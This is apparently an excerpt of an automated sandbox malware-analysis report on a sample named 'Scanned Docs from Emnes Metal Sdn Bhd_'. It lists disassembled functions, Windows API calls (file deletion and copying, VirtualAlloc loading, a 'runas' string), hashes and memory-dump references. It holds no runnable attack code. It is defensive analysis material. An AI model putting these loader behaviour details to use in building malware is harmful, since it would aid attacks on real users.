                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                      • String ID: runas
                                                      • API String ID: 448630720-4000483414
                                                      • Opcode ID: fad9135566f6b8d06f6bb824477ce36d6000a81a06809650597d94dc5a28979f
                                                      • Instruction ID: 7b584310d95951995c2650026822ccf52f5c5a5bb55401f4bf426be403000ce0
                                                      • Opcode Fuzzy Hash: fad9135566f6b8d06f6bb824477ce36d6000a81a06809650597d94dc5a28979f
                                                      • Instruction Fuzzy Hash: 2911063912A301AAC706FF60D851FBEB7A89B95705F44142DF082160E3CF218A6E8B52
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,002C5222), ref: 002EDBCE
                                                      • GetFileAttributesW.KERNELBASE(?), ref: 002EDBDD
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 002EDBEE
                                                      • FindClose.KERNEL32(00000000), ref: 002EDBFA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2695905019-0
                                                      • Opcode ID: ad268228acd9646ffd6a6fa6aa65e786400b75faf5416647a5186e56b4d024da
                                                      • Instruction ID: 1abc0b539b01e83671e0f5eb95c0491d59e86c0c505b6cf02bdb8351803a8b23
                                                      • Opcode Fuzzy Hash: ad268228acd9646ffd6a6fa6aa65e786400b75faf5416647a5186e56b4d024da
                                                      • Instruction Fuzzy Hash: C2F0A0308B091067C2216F78AC0D8AA376C9E05374FA0AB03F836C20E0EBB059658696
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: p#5
                                                      • API String ID: 3964851224-1135215104
                                                      • Opcode ID: 5cb0958253a28219a4712adf22c97562182fd70ebc9e6e01a22c2aacf4bfb991
                                                      • Instruction ID: 2ddcfed66205ba60fdb759cf35a3268a8840909a51df16e2b04adf631ab027fe
                                                      • Opcode Fuzzy Hash: 5cb0958253a28219a4712adf22c97562182fd70ebc9e6e01a22c2aacf4bfb991
                                                      • Instruction Fuzzy Hash: 99A27E745293018FD714DF14C480B2AB7E1BF89304F24896EE9999B3A2D771EC65CFA2
                                                      APIs
                                                      • GetInputState.USER32 ref: 0028D807
                                                      • timeGetTime.WINMM ref: 0028DA07
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028DB28
                                                      • TranslateMessage.USER32(?), ref: 0028DB7B
                                                      • DispatchMessageW.USER32(?), ref: 0028DB89
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028DB9F
                                                      • Sleep.KERNEL32(0000000A), ref: 0028DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                      • String ID:
                                                      • API String ID: 2189390790-0
                                                      • Opcode ID: b1f6cb30140b23509630b3b5cb76b377b0b785ae3670de7dab54e4dfae01cbdd
                                                      • Instruction ID: 29c62f7752958eb3bb93b08b75a3d0900f1c28b47d5e44b33f4d78aa3ca04fed
                                                      • Opcode Fuzzy Hash: b1f6cb30140b23509630b3b5cb76b377b0b785ae3670de7dab54e4dfae01cbdd
                                                      • Instruction Fuzzy Hash: 9E420134629342EFD729EF24C844BAAB7A4BF55314F14851AE495873E1D7B0EC68CF82

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00282D07
                                                      • RegisterClassExW.USER32(00000030), ref: 00282D31
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00282D42
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00282D5F
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00282D6F
                                                      • LoadIconW.USER32(000000A9), ref: 00282D85
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00282D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 629c0db19c4fd719bf041fae5683b378fc2bf54db44f51b2144b889e957adab6
                                                      • Instruction ID: f56fcb2d6e78d9cbef4f1b2a938c0cb7d310ce45739db63029399728977e5757
                                                      • Opcode Fuzzy Hash: 629c0db19c4fd719bf041fae5683b378fc2bf54db44f51b2144b889e957adab6
                                                      • Instruction Fuzzy Hash: 4D21C0B5961318AFDB02DFA4EC89BDDBBB8FB0C701F00911AF511A62A0D7B14544CF91

                                                      Control-flow Graph

                                                      [control-flow graph for the function at 2b8d45: rendered graph not recoverable, edge data omitted]
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .*
                                                      • API String ID: 0-1914541848
                                                      • Opcode ID: 69547e90c56ca0f7c3dbb6dee2b7f09708283c8767c79899bf0a02cbe85df732
                                                      • Instruction ID: d8c747ed95cddca5fdd6e3ba3899b728ad5e76cbe53c63461967b80ec498ac25
                                                      • Opcode Fuzzy Hash: 69547e90c56ca0f7c3dbb6dee2b7f09708283c8767c79899bf0a02cbe85df732
                                                      • Instruction Fuzzy Hash: 54C11574D2434AAFCB11EFA8D840BEDBBB8AF09350F144459F918A7392CB758991CF60

                                                       Control-flow Graph
                                                       • Function entry: 2c065b (rendered graph not reproduced; basic blocks in this function call GetFileType, GetLastError and CloseHandle)
                                                      APIs
                                                        • Part of subcall function 002C039A: CreateFileW.KERNELBASE(00000000,00000000,?,002C0704,?,?,00000000,?,002C0704,00000000,0000000C), ref: 002C03B7
                                                      • GetLastError.KERNEL32 ref: 002C076F
                                                      • __dosmaperr.LIBCMT ref: 002C0776
                                                      • GetFileType.KERNELBASE(00000000), ref: 002C0782
                                                      • GetLastError.KERNEL32 ref: 002C078C
                                                      • __dosmaperr.LIBCMT ref: 002C0795
                                                      • CloseHandle.KERNEL32(00000000), ref: 002C07B5
                                                      • CloseHandle.KERNEL32(?), ref: 002C08FF
                                                      • GetLastError.KERNEL32 ref: 002C0931
                                                      • __dosmaperr.LIBCMT ref: 002C0938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 2cb9eef673f2fa49bc5e53794671dd3dac8fe9f79ab6390c4ffee591641cf0a2
                                                      • Instruction ID: 06da3ec05ce8096fb521934057c12c7720be3695c9abff153beab0bc51bd465e
                                                      • Opcode Fuzzy Hash: 2cb9eef673f2fa49bc5e53794671dd3dac8fe9f79ab6390c4ffee591641cf0a2
                                                      • Instruction Fuzzy Hash: 46A14832A20205CFDF19AF68D891BAD7BA4AB06320F14425DF8159F2A1DB359D22CF91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00283A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00351418,?,00282E7F,?,?,?,00000000), ref: 00283A78
                                                        • Part of subcall function 00283357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00283379
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0028356A
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002C318D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002C31CE
                                                      • RegCloseKey.ADVAPI32(?), ref: 002C3210
                                                      • _wcslen.LIBCMT ref: 002C3277
                                                      • _wcslen.LIBCMT ref: 002C3286
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 98802146-2727554177
                                                      • Opcode ID: 93e7fcaadf63307315b32b86bf707c422594de6da032ebefa9d5ad44b1db1773
                                                      • Instruction ID: adff837d64a3cc93f82112fc05f2a087db316881ffbf7cb28a8f47b25a01988d
                                                      • Opcode Fuzzy Hash: 93e7fcaadf63307315b32b86bf707c422594de6da032ebefa9d5ad44b1db1773
                                                      • Instruction Fuzzy Hash: 0F719B795293019EC716EF65DC819ABBBECBF8A740F40492EF445931B0EB309A58CF52

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00282B8E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00282B9D
                                                      • LoadIconW.USER32(00000063), ref: 00282BB3
                                                      • LoadIconW.USER32(000000A4), ref: 00282BC5
                                                      • LoadIconW.USER32(000000A2), ref: 00282BD7
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00282BEF
                                                      • RegisterClassExW.USER32(?), ref: 00282C40
                                                        • Part of subcall function 00282CD4: GetSysColorBrush.USER32(0000000F), ref: 00282D07
                                                        • Part of subcall function 00282CD4: RegisterClassExW.USER32(00000030), ref: 00282D31
                                                        • Part of subcall function 00282CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00282D42
                                                        • Part of subcall function 00282CD4: InitCommonControlsEx.COMCTL32(?), ref: 00282D5F
                                                        • Part of subcall function 00282CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00282D6F
                                                        • Part of subcall function 00282CD4: LoadIconW.USER32(000000A9), ref: 00282D85
                                                        • Part of subcall function 00282CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00282D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 06731aa7f542c59952751810c5c4c9c173afa842f903d0dba0f0edd5a18e4d7f
                                                      • Instruction ID: 37335a48402ca755b2722f0e0732b3a795a1adfc98687ecec0f1fcb3fc8dc836
                                                      • Opcode Fuzzy Hash: 06731aa7f542c59952751810c5c4c9c173afa842f903d0dba0f0edd5a18e4d7f
                                                      • Instruction Fuzzy Hash: 1D215E78E50314AFDB129FA6EC65BAD7FB8FB08B51F00515AF500A66B0D3B10940CF90
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0028BB4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: p#5$p#5$p#5$p#5$p%5$p%5$x#5$x#5
                                                      • API String ID: 1385522511-3150480149
                                                      • Opcode ID: 193966bb04a84303b1284a2b4ab2fd05a2db7734076319448af596cc0ee95b67
                                                      • Instruction ID: 0807a049abb721051234ece40a880e6b40792093b8f8f9af74df6a8d92a7d4e4
                                                      • Opcode Fuzzy Hash: 193966bb04a84303b1284a2b4ab2fd05a2db7734076319448af596cc0ee95b67
                                                      • Instruction Fuzzy Hash: DC32DD38A2120A9FDB16DF54C894BBEB7B9EF45304F14805AED05AB3A1C774ED61CB90

                                                       Control-flow Graph
                                                       • Function entry: 283170 (rendered graph not reproduced; basic blocks in this function call DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, KillTimer, CreatePopupMenu, MoveWindow and SetFocus)
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0028316A,?,?), ref: 002831D8
                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0028316A,?,?), ref: 00283204
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00283227
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0028316A,?,?), ref: 00283232
                                                      • CreatePopupMenu.USER32 ref: 00283246
                                                      • PostQuitMessage.USER32(00000000), ref: 00283267
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 972495d7e208042f91ddb6bda368496efe3db885da5d316ab88ef739cfbccd65
                                                      • Instruction ID: 485bf0636fe39fd2f4e39c48ab54c7f1e2891e0aee31aca53e65c23c82e26e1d
                                                      • Opcode Fuzzy Hash: 972495d7e208042f91ddb6bda368496efe3db885da5d316ab88ef739cfbccd65
                                                      • Instruction Fuzzy Hash: 0641293D271205AADB16BF789C1DBBD362DE705F01F044115F906851F1CBE1AE749BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D%5$D%5$D%5$D%5$D%5D%5$Variable must be of type 'Object'.
                                                      • API String ID: 0-3570658891
                                                      • Opcode ID: 9f2ef1fe7f05f3db2e198f584dc69352bb9b4893eed1fa75fc46969c9e115ecf
                                                      • Instruction ID: faaae4e32aa59fe6cf533f66658268a31426fc1f8a9440984af3345ed6aa51e9
                                                      • Opcode Fuzzy Hash: 9f2ef1fe7f05f3db2e198f584dc69352bb9b4893eed1fa75fc46969c9e115ecf
                                                      • Instruction Fuzzy Hash: C4C2BF79A21205CFDF14EF58C880AADB7B1BF09300F25856AE905AB3A1D375ED61CF91

                                                       Control-flow Graph
                                                       • Function entry: 32025f0 (rendered graph not reproduced; basic blocks in this function call CreateFileW, VirtualAlloc, ReadFile, VirtualFree and FindCloseChangeNotification)
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 032026C1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 032028E7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction ID: 704f3aff50724e9df95a5824dba59340fb82e123f91d6b2493ec046bf46294ce
                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction Fuzzy Hash: E7A12874E10209EBDB14CFA4C898BAEB7B5BF48304F20859AE501BB2C1C7759A85CF60

                                                       Control-flow Graph
                                                       • Function entry: 282c63 (single basic block 282c63-282cd3; rendered graph not reproduced; the block calls CreateWindowExW twice and ShowWindow twice)
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00282C91
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00282CB2
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00281CAD,?), ref: 00282CC6
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00281CAD,?), ref: 00282CCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: 7f6b080d7e7d2c658996373bc2b273701d5fc609d43d41295d6675ad34274a6d
                                                      • Instruction ID: 4fd0fdcfb36709a1051da5b3e2cbf2f8512d795eb1e70281117f708f77b5317c
                                                      • Opcode Fuzzy Hash: 7f6b080d7e7d2c658996373bc2b273701d5fc609d43d41295d6675ad34274a6d
                                                      • Instruction Fuzzy Hash: 7BF0D4796913907AEB331B27AC18FB72EBDD7CAF61F01505AF900A65B0C6A11850DAB4

                                                       Control-flow Graph
                                                       • Function entry: 32023b0 (rendered graph not reproduced; basic blocks in this function call CreateFileW, VirtualAlloc, ReadFile and ExitProcess)
                                                      APIs
                                                        • Part of subcall function 032022A0: Sleep.KERNELBASE(000001F4), ref: 032022B1
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 032024DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: UCX4CCKQI365
                                                      • API String ID: 2694422964-3829034217
                                                      • Opcode ID: 9625ef834ae756dd7d652cb8c2b079bee33651227709e5552c9cd1d55fc74a2c
                                                      • Instruction ID: a070a9c96db93a2b35321f8b2233adb66b0691d6c809171ccc11beab73e98b24
                                                      • Opcode Fuzzy Hash: 9625ef834ae756dd7d652cb8c2b079bee33651227709e5552c9cd1d55fc74a2c
                                                      • Instruction Fuzzy Hash: DE51A630D14349EBEF14DBE4C854BEEBB79AF48300F004599E609BB2C1D6B91B49CBA5

                                                      Control-flow Graph

                                                      control_flow_graph 1527 2f2947-2f29b9 call 2c1f50 call 2f25d6 call 29fe0b call 285722 call 2f274e call 28511f call 2a5232 1542 2f29bf-2f29c6 call 2f2e66 1527->1542 1543 2f2a6c-2f2a73 call 2f2e66 1527->1543 1548 2f29cc-2f2a6a call 2ad583 call 2a4983 call 2a9038 call 2ad583 call 2a9038 * 2 1542->1548 1549 2f2a75-2f2a77 1542->1549 1543->1549 1550 2f2a7c 1543->1550 1553 2f2a7f-2f2b3a call 2850f5 * 8 call 2f3017 call 2ae5eb 1548->1553 1552 2f2cb6-2f2cb7 1549->1552 1550->1553 1554 2f2cd5-2f2cdb 1552->1554 1592 2f2b3c-2f2b3e 1553->1592 1593 2f2b43-2f2b5e call 2f2792 1553->1593 1557 2f2cdd-2f2ced call 29fdcd call 29fe14 1554->1557 1558 2f2cf0-2f2cf6 1554->1558 1557->1558 1592->1552 1596 2f2b64-2f2b6c 1593->1596 1597 2f2bf0-2f2bfc call 2ae678 1593->1597 1598 2f2b6e-2f2b72 1596->1598 1599 2f2b74 1596->1599 1604 2f2bfe-2f2c0d DeleteFileW 1597->1604 1605 2f2c12-2f2c16 1597->1605 1601 2f2b79-2f2b97 call 2850f5 1598->1601 1599->1601 1611 2f2b99-2f2b9e 1601->1611 1612 2f2bc1-2f2bd7 call 2f211d call 2adbb3 1601->1612 1604->1552 1607 2f2c18-2f2c7e call 2f25d6 call 2ad2eb * 2 call 2f22ce 1605->1607 1608 2f2c91-2f2ca5 CopyFileW 1605->1608 1609 2f2cb9-2f2ccf DeleteFileW call 2f2fd8 1607->1609 1632 2f2c80-2f2c8f DeleteFileW 1607->1632 1608->1609 1610 2f2ca7-2f2cb4 DeleteFileW 1608->1610 1619 2f2cd4 1609->1619 1610->1552 1616 2f2ba1-2f2bb4 call 2f28d2 1611->1616 1625 2f2bdc-2f2be7 1612->1625 1626 2f2bb6-2f2bbf 1616->1626 1619->1554 1625->1596 1629 2f2bed 1625->1629 1626->1612 1629->1597 1632->1552
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F2C05
                                                      • DeleteFileW.KERNEL32(?), ref: 002F2C87
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002F2C9D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F2CAE
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F2CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
